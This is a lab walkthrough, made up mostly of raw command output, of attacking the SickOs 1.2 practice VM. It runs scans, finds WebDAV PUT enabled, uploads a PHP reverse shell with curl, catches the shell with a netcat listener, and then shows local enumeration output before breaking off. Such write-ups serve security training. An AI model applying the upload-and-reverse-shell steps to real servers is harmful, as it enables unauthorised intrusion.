This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.2 vulnarable VM:
https://www.vulnhub.com/entry/sickos-12,144/
Home brewed tools used: https://github.com/iuristanchev/pentesting_tools
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.9 00:0c:29:98:f5:19 1 60 VMware, Inc.
Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
Nmap scan report for 192.168.1.9
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
| http-useragent-tester:
|
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
| WWW-Mechanize/1.34
|_
MAC Address: 00:0C:29:98:F5:19 (VMware)
Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT STATE SERVICE
80/tcp open http
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
| <!-- NOTHING IN HERE ///\\\ -->
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
|_ ///\\\ -->>>>
MAC Address: 00:0C:29:98:F5:19 (VMware)
amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 4 20:57:05 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.1.9:80/ ----
==> DIRECTORY: http://192.168.1.9:80/test/
+ http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)
---- Entering directory: http://192.168.1.9:80/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 04 Jan 2017 21:01:06 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.9 left intact
nc -nlvp 443
curl --upload-file /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0
* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5495
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 04 Jan 2017 21:43:01 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
13:43:47 up 1:30, 0 users, load average: 0.02, 0.04, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$
python -c 'import pty; pty.spawn("/bin/sh")'
cat /etc/debian_version
wheezy/sid
uname -v
#25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#
Debug Info
thorough tests = disabled
Scan started at:
Thu Jan 5 09:43:36 PST 2017
### SYSTEM ##############################################
Kernel information:
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
Kernel information (continued):
Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
NAME="Ubuntu"
VERSION="12.04.4 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
VERSION_ID="12.04"
Hostname:
ubuntu
### USER/GROUP ##########################################
Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Users that have previously logged onto the system:
Username Port From Latest
root pts/0 192.168.0.100 Tue Apr 26 03:57:15 -0700 2016
john tty1 Wed Mar 30 05:09:38 -0700 2016
All users and uid/gid info:
root:x:0:0
daemon:x:1:1
bin:x:2:2
sys:x:3:3
sync:x:4:65534
games:x:5:60
man:x:6:12
lp:x:7:7
mail:x:8:8
news:x:9:9
uucp:x:10:10
proxy:x:13:13
www-data:x:33:33
backup:x:34:34
list:x:38:38
irc:x:39:39
gnats:x:41:41
nobody:x:65534:65534
libuuid:x:100:101
syslog:x:101:103
messagebus:x:102:104
john:x:1000:1000
sshd:x:103:65534
Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
Super user account(s):
root
Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 30 2016 .
drwxr-xr-x 22 root root 4.0K Mar 30 2016 ..
drwxr-xr-x 3 john john 4.0K Apr 12 2016 john
Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
Path information:
/sbin:/bin:/usr/sbin:/usr/bin
Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
Current umask value:
0000
u=rwx,g=rwx,o=rwx
umask value as specified in /etc/login.defs:
UMASK 022
Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
-rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
-rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
-rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 730 Sep 13 2013 apt-xapian-index
-rwxr-xr-x 1 root root 907 Dec 28 2012 man-db
Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:0c:29:98:f5:19
inet addr:192.168.1.9 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:268 errors:0 dropped:0 overruns:0 frame:0
TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:142432 (142.4 KB) TX bytes:22042 (22.0 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Nameserver(s):
nameserver 192.168.1.1
Default route:
default 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.9:56045 192.168.1.20:443 ESTABLISHED 984/php-cgi
tcp 0 0 192.168.1.9:80 192.168.1.20:48676 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:68 0.0.0.0:* -
### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.5 0.1 3396 1832 ? Ss 09:41 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 09:41 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 09:41 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:0]
root 5 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/0:0H]
root 6 0.1 0.0 0 0 ? S 09:41 0:00 [kworker/u16:0]
root 7 0.0 0.0 0 0 ? S 09:41 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_sched]
root 10 0.0 0.0 0 0 ? S 09:41 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 09:41 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 09:41 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 09:41 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 09:41 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 09:41 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 09:41 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/u17:0]
root 18 0.0 0.0 0 0 ? S< 09:41 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 09:41 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 09:41 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 09:41 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 09:41 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 09:41 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 09:41 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 09:41 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? SN 09:41 0:00 [khugepaged]
root 29 0.0 0.0 0 0 ? S 09:41 0:00 [fsnotify_mark]
root 30 0.0 0.0 0 0 ? S 09:41 0:00 [ecryptfs-kthrea]
root 31 0.0 0.0 0 0 ? S< 09:41 0:00 [crypto]
root 43 0.0 0.0 0 0 ? S< 09:41 0:00 [kthrotld]
root 44 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:1]
root 45 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_1]
root 47 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:2]
root 48 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:3]
root 49 0.0 0.0 0 0 ? S< 09:41 0:00 [dm_bufio_cache]
root 50 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:4]
root 69 0.0 0.0 0 0 ? S< 09:41 0:00 [deferwq]
root 70 0.0 0.0 0 0 ? S< 09:41 0:00 [charger_manager]
root 71 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:2]
root 193 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt_poll_0]
root 208 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt/0]
root 220 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_2]
root 221 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_3]
root 227 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_4]
root 229 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_5]
root 231 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_6]
root 232 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_7]
root 233 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_8]
root 234 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_9]
root 237 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_10]
root 238 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_11]
root 239 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_12]
root 240 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_13]
root 241 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_14]
root 242 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_15]
root 243 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_16]
root 244 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_17]
root 245 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_18]
root 246 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_19]
root 247 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_20]
root 248 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_21]
root 249 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_22]
root 250 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_23]
root 251 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_24]
root 252 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_25]
root 253 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_26]
root 254 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_27]
root 255 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_28]
root 256 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_29]
root 257 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_30]
root 258 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_31]
root 259 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:5]
root 260 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:6]
root 261 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:7]
root 262 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:8]
root 263 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:9]
root 264 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:10]
root 265 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:11]
root 266 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:12]
root 267 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:13]
root 268 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:14]
root 269 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:15]
root 270 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:16]
root 271 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:17]
root 272 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:18]
root 273 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:19]
root 274 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:20]
root 275 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:21]
root 276 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:22]
root 277 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:23]
root 278 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:24]
root 279 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:25]
root 280 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:26]
root 281 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:27]
root 282 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:28]
root 283 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:29]
root 284 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:30]
root 285 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:31]
root 286 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_32]
root 287 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:32]
root 379 0.0 0.0 0 0 ? S 09:41 0:00 [jbd2/sda1-8]
root 380 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-rsv-conver]
root 381 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-unrsv-conv]
root 469 0.0 0.0 2832 608 ? S 09:41 0:00 upstart-udev-bridge --daemon
root 471 0.0 0.1 3080 1296 ? Ss 09:41 0:00 /sbin/udevd --daemon
102 547 0.0 0.0 3256 652 ? Ss 09:41 0:00 dbus-daemon --system --fork --activation=upstart
syslog 557 0.1 0.1 30036 1472 ? Sl 09:41 0:00 rsyslogd -c5
root 622 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 623 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 642 0.0 0.0 0 0 ? S< 09:41 0:00 [ttm_swap]
root 706 0.0 0.0 0 0 ? S< 09:41 0:00 [kpsmoused]
root 752 0.0 0.0 2844 348 ? S 09:41 0:00 upstart-socket-bridge --daemon
root 797 0.0 0.0 2924 404 ? Ss 09:41 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 819 0.0 0.2 6680 2400 ? Ss 09:41 0:00 /usr/sbin/sshd -D
root 899 0.0 0.0 4628 840 tty4 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty4
root 903 0.0 0.0 4628 836 tty5 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty5
root 907 0.0 0.0 4628 844 tty2 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty2
root 908 0.0 0.0 4628 832 tty3 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty3
root 912 0.0 0.0 4628 836 tty6 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty6
root 920 0.0 0.0 2616 884 ? Ss 09:41 0:00 cron
daemon 921 0.0 0.0 2468 348 ? Ss 09:41 0:00 atd
www-data 966 0.0 0.2 8272 2236 ? S 09:41 0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
www-data 968 0.0 0.4 17844 4720 ? Ss 09:41 0:00 /usr/bin/php-cgi
www-data 982 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 983 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 984 0.0 0.2 18100 3072 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 985 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
root 1003 0.0 0.0 4628 836 tty1 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty1
root 1187 0.0 0.0 22584 564 ? Ssl 09:41 0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
root 1206 0.1 0.5 11268 5660 ? S 09:41 0:00 /usr/sbin/vmtoolsd
root 1230 0.0 0.7 14736 7840 ? S 09:41 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data 1243 0.0 0.0 2232 544 ? S 09:41 0:00 sh -c uname -a; w; id; /bin/bash -i
www-data 1247 0.0 0.1 3448 1708 ? S 09:41 0:00 /bin/bash -i
www-data 3185 0.2 0.1 3412 1428 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3467 0.0 0.0 3384 644 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3468 0.0 0.1 2860 1032 ? R 09:43 0:00 ps aux
Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 920788 Mar 28 2013 /bin/bash
-rwxr-xr-x 2 root root 26696 Mar 29 2012 /sbin/getty
-rwxr-xr-x 1 root root 194528 Jan 18 2013 /sbin/init
-rwxr-xr-x 1 root root 177552 Jul 19 2013 /sbin/udevd
lrwxrwxrwx 1 root root 25 Apr 12 2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
-rwxr-xr-x 1 root root 187332 Dec 20 2011 /usr/sbin/lighttpd
-rwxr-xr-x 1 root root 531776 Jan 13 2016 /usr/sbin/sshd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader
/etc/init.d/ binary permissions:
total 144
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 0 Mar 30 2016 .legacy-bootordering
-rw-r--r-- 1 root root 2427 Jul 26 2012 README
-rwxr-xr-x 1 root root 4596 Sep 25 2012 apparmor
lrwxrwxrwx 1 root root 21 Oct 25 2011 atd -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2444 Jul 26 2012 bootlogd
lrwxrwxrwx 1 root root 21 Apr 19 2012 console-setup -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 19 2012 cron -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 13 2013 dbus -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Nov 26 2013 dmesg -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1242 Dec 13 2011 dns-clean
lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1105 Dec 15 2015 grub-common
-rwxr-xr-x 1 root root 1329 Jul 26 2012 halt
lrwxrwxrwx 1 root root 21 May 26 2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Feb 3 2012 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1293 Jul 26 2012 killprocs
-rwxr-xr-x 1 root root 2545 Aug 19 2010 lighttpd
lrwxrwxrwx 1 root root 21 Nov 20 2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-container -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2797 Feb 13 2012 networking
-rwxr-xr-x 1 root root 882 Jul 26 2012 ondemand
lrwxrwxrwx 1 root root 21 Sep 12 2012 passwd -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-ready -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 561 Feb 4 2011 pppd-dns
lrwxrwxrwx 1 root root 21 Oct 28 2013 procps -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 8635 Jul 26 2012 rc
-rwxr-xr-x 1 root root 801 Jul 26 2012 rc.local
-rwxr-xr-x 1 root root 117 Jul 26 2012 rcS
-rwxr-xr-x 1 root root 639 Jul 26 2012 reboot
lrwxrwxrwx 1 root root 21 Sep 8 2012 resolvconf -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4395 Nov 8 2011 rsync
lrwxrwxrwx 1 root root 21 Nov 26 2013 rsyslog -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4321 Jul 26 2012 sendsigs
lrwxrwxrwx 1 root root 21 Apr 19 2012 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 590 Jul 26 2012 single
-rw-r--r-- 1 root root 4304 Jul 26 2012 skeleton
-rwxr-xr-x 1 root root 4371 Jan 13 2016 ssh
-rwxr-xr-x 1 root root 567 Jul 26 2012 stop-bootlogd
-rwxr-xr-x 1 root root 1143 Jul 26 2012 stop-bootlogd-single
-rwxr-xr-x 1 root root 700 May 23 2012 sudo
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-finish -> /lib/init/upstart-job
